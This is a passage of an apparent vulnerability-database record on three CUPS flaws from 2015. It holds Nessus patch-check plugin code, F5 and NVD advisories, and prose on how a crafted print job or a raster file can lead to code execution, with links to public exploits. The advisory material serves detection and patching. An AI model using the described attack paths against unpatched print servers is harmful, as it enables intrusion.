https://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?124ba55b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?646be46a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 9}, "differentElements": ["references", "modified"], "edition": 6, "lastseen": "2018-11-11T08:35:25"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c5bff0491c78f8e2241f90164d8cbe6f"}, {"key": "cvelist", "hash": "20a3b22f38036d445be91ac3db867352"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "42a303b6c8ee4f399e2b408d8aa372af"}, {"key": "href", "hash": "883afaca71e4c27b13b077c8f0d80806"}, {"key": "modified", "hash": "3c764d4cf584f9ded7aa4dcca57c78ff"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, {"key": "pluginID", "hash": "52b779c6cb4db7f4867db45da7a5d907"}, {"key": "published", "hash": "9fe7fac5643c2de42bab95a37df308be"}, {"key": "references", "hash": "223cc67f80118013b8f405c8bd0d179c"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "e0dcfe84c744bb8eb47e33589cc92f3b"}, {"key": "title", "hash": "164a4115e940e28685331ff6cf8244a3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f1063fc0a25ff916bbb2d4662ab3db1f3a98e7f229cf972efec12c236afccd43", "viewCount": 9, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?124ba55b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?646be46a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "84276", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"]}

{"f5": [{"lastseen": "2016-03-19T09:01:42", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": " * [CVE-2015-1158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158>)\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded, which in turn allows the attacker to run arbitrary code on the CUPS server.\n\n * [CVE-2015-1159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159>)\n\nA cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web.\n", "reporter": "f5", "published": "2015-06-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "SOL16794 - CUPS vulnerabilities CVE-2015-1158 / CVE-2015-1159", "type": "f5", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/700/sol16794.html", "id": "SOL16794", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:10", "references": [], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.1| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "reporter": "f5", "published": "2016-10-19T00:05:00", "title": "CUPS vulnerability CVE-2014-9679", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-9679"], "modified": "2016-10-19T00:05:00", "href": "https://support.f5.com/csp/article/K52950150", "id": "F5:K52950150", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-18T21:25:01", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "reporter": "f5", "published": "2016-10-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "f5", "title": "SOL52950150 - CUPS vulnerability CVE-2014-9679", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-9679"], "modified": "2016-10-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/52/sol52950150.html", "id": "SOL52950150", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-11-01T05:14:38", "references": ["http://www.debian.org/security/2015/dsa-3172", "http://rhn.redhat.com/errata/RHSA-2015-1123.html", "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:049", "http://www.securityfocus.com/bid/72594", "https://security.gentoo.org/glsa/201607-06", "http://lists.fedoraproject.org/pipermail/package-announce/2015-February/150177.html", "https://www.cups.org/str.php?L4551", "http://www.securitytracker.com/id/1031776", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:108", "http://advisories.mageia.org/MGASA-2015-0067.html", "http://lists.opensuse.org/opensuse-updates/2015-02/msg00098.html", "http://www.ubuntu.com/usn/USN-2520-1", "http://www.openwall.com/lists/oss-security/2015/02/12/12", "http://lists.fedoraproject.org/pipermail/package-announce/2015-February/150171.html", "http://www.openwall.com/lists/oss-security/2015/02/10/15"], "description": "Integer underflow in the cupsRasterReadPixels function in filter/raster.c in CUPS before 2.0.2 allows remote attackers to have unspecified impact via a malformed compressed raster file, which triggers a buffer overflow.", "edition": 3, "reporter": "NVD", "published": "2015-02-19T10:59:11", "title": "CVE-2014-9679", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-9679"], "scanner": [], "modified": "2018-10-30T12:27:35", "cpe": ["cpe:/a:apple:cups:2.0.1"], "id": "CVE-2014-9679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9679", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-23T10:41:35", "references": ["http://rhn.redhat.com/errata/RHSA-2015-1123.html", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00010.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1221641", "http://www.cups.org/blog.php?L1082", "https://www.exploit-db.com/exploits/41233/", "https://code.google.com/p/google-security-research/issues/detail?id=455", "http://googleprojectzero.blogspot.in/2015/06/owning-internet-printing-case-study-in.html", "http://www.debian.org/security/2015/dsa-3283", "https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py", "http://www.ubuntu.com/usn/USN-2629-1", "http://www.kb.cert.org/vuls/id/810572", "https://www.exploit-db.com/exploits/37336/", "https://security.gentoo.org/glsa/201510-07", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00003.html", "http://www.securitytracker.com/id/1032556", "http://www.securityfocus.com/bid/75098", "http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10702", "https://bugzilla.opensuse.org/show_bug.cgi?id=924208", "https://www.cups.org/str.php?L4609", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00006.html"], "edition": 5, "description": "The add_job function in scheduler/ipp.c in cupsd in CUPS before 2.0.3 performs incorrect free operations for multiple-value job-originating-host-name attributes, which allows remote attackers to trigger data corruption for reference-counted strings via a crafted (1) IPP_CREATE_JOB or (2) IPP_PRINT_JOB request, as demonstrated by replacing the configuration file and consequently executing arbitrary code.", "reporter": "NVD", "published": "2015-06-26T06:59:00", "title": "CVE-2015-1158", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-1158"], "scanner": [], "cpe": ["cpe:/a:cups:cups:2.0.2"], "modified": "2017-09-22T21:29:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1158", "id": "CVE-2015-1158", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-23T10:41:35", "references": ["http://rhn.redhat.com/errata/RHSA-2015-1123.html", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00010.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1221642", "http://www.cups.org/blog.php?L1082", "https://code.google.com/p/google-security-research/issues/detail?id=455", "http://googleprojectzero.blogspot.in/2015/06/owning-internet-printing-case-study-in.html", "http://www.debian.org/security/2015/dsa-3283", "http://www.securityfocus.com/bid/75106", "http://www.ubuntu.com/usn/USN-2629-1", "http://www.kb.cert.org/vuls/id/810572", "https://security.gentoo.org/glsa/201510-07", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00003.html", "http://www.securitytracker.com/id/1032556", "http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10702", "https://bugzilla.opensuse.org/show_bug.cgi?id=924208", "https://www.cups.org/str.php?L4609", "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00006.html"], "edition": 3, "description": "Cross-site scripting (XSS) vulnerability in the cgi_puts function in cgi-bin/template.c in the template engine in CUPS before 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter to help/.", "reporter": "NVD", "published": "2015-06-26T06:59:02", "title": "CVE-2015-1159", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-1159"], "scanner": [], "cpe": ["cpe:/a:cups:cups:2.0.2"], "modified": "2017-09-22T21:29:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1159", "id": "CVE-2015-1159", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-01T23:35:01", "references": ["https://oss.oracle.com/pipermail/el-errata/2015-June/005130.html", "https://oss.oracle.com/pipermail/el-errata/2015-June/005129.html"], "pluginID": "84256", "description": "From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 5, "reporter": "Tenable", "published": "2015-06-18T00:00:00", "title": "Oracle Linux 6 / 7 : cups (ELSA-2015-1123)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-07-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:cups", "p-cpe:/a:oracle:linux:cups-filesystem", "p-cpe:/a:oracle:linux:cups-libs", "p-cpe:/a:oracle:linux:cups-php", "p-cpe:/a:oracle:linux:cups-devel", "p-cpe:/a:oracle:linux:cups-client", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:cups-lpd", "p-cpe:/a:oracle:linux:cups-ipptool"], "id": "ORACLELINUX_ELSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# Oracle Linux Security Advisory ELSA-2015-1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84256);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:58\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Oracle Linux 6 / 7 : cups (ELSA-2015-1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS 